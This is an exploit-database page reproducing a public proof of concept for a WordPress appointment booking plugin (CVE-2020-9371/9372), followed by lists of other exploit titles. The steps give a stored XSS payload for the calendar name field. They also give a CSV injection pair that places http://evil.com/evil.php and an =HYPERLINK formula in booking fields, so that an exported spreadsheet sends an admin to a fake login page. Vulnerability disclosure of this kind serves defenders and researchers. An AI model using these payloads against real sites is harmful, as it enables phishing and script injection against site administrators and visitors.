Become a patron and gain access to the dashboard, Schedule scan, API and Search

Search for hundreds of thousands of exploits

"Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection"

Author

Exploit author

"Daniel Monzón"

Platform

Exploit platform

php

Release date

Exploit published date

2020-03-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
# Google Dork: N/A
# Date: 2020-03-05
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.codepeople.net/
# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip
# Version: 1.3.34
# Tested on: Windows 7 x86 SP1
# CVE : CVE-2020-9371, CVE-2020-9372

----Stored Cross-Site-Scripting-------------------

1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php
2) Calendar Name=<script>alert(0)</script> and Update
3) Click in any of the other tabs

----CSV injection---------------------------------

1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out) 
2) Then we go to the page and introduce data, and the payload:

New booking:

Name: IMPORTANT DATA
Description: http://evil.com/evil.php

New booking:

Name: test
Description: =HYPERLINK(K2;H2) 

This is the way it would work if i had a business registered and the payment was completed it can also be done by adding the new bookings with the same data from the admin panel

3) Then we go to Bookings List and export the CSV file
4) After that we open the file, and import data from an external file, using comma as separator
5) Hyperlink to malicious PHP file is inserted and the user clicks on it, user is redirected to a fake login page (for example)

Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016
Release Date Title Type Platform Author
2020-10-16 "Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)" webapps php "Rahul Ramkumar"
2020-10-16 "Hotel Management System 1.0 - Remote Code Execution (Authenticated)" webapps php Aporlorxl23
2020-10-16 "Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)" webapps php b1nary
2020-10-16 "aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)" webapps python "Ünsal Furkan Harani"
2020-10-16 "Employee Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "Company Visitor Management System (CVMS) 1.0 - Authentication Bypass" webapps php "Oğuz Türkgenç"
2020-10-16 "Employee Management System 1.0 - Cross Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-16 "Alumni Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "CS-Cart 1.3.3 - authenticated RCE" webapps php 0xmmnbassel
2020-10-16 "Seat Reservation System 1.0 - Unauthenticated SQL Injection" webapps php "Rahul Ramkumar"
Release Date Title Type Platform Author
2020-10-16 "Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)" webapps php "Rahul Ramkumar"
2020-10-16 "Seat Reservation System 1.0 - Unauthenticated SQL Injection" webapps php "Rahul Ramkumar"
2020-10-16 "Company Visitor Management System (CVMS) 1.0 - Authentication Bypass" webapps php "Oğuz Türkgenç"
2020-10-16 "Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)" webapps php b1nary
2020-10-16 "Alumni Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "Hotel Management System 1.0 - Remote Code Execution (Authenticated)" webapps php Aporlorxl23
2020-10-16 "CS-Cart 1.3.3 - authenticated RCE" webapps php 0xmmnbassel
2020-10-16 "Employee Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "Employee Management System 1.0 - Cross Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-16 "CS-Cart 1.3.3 - 'classes_dir' LFI" webapps php 0xmmnbassel
Release Date Title Type Platform Author
2020-10-15 "rConfig 3.9.5 - Remote Code Execution (Unauthenticated)" webapps php "Daniel Monzón"
2020-07-02 "ZenTao Pro 8.8.2 - Command Injection" webapps php "Daniel Monzón"
2020-05-21 "OpenEDX platform Ironwood 2.5 - Remote Code Execution" webapps multiple "Daniel Monzón"
2020-05-18 "Online Healthcare Patient Record Management System 1.0 - Authentication Bypass" webapps php "Daniel Monzón"
2020-04-27 "Online Course Registration 2.0 - Authentication Bypass" webapps php "Daniel Monzón"
2020-04-13 "Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion" webapps php "Daniel Monzón"
2020-03-12 "Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection" webapps php "Daniel Monzón"
2020-03-11 "Wordpress Plugin Search Meter 2.13.2 - CSV injection" webapps php "Daniel Monzón"
2020-01-31 "Lotus Core CMS 1.0.1 - Local File Inclusion" webapps php "Daniel Monzón"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48204/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.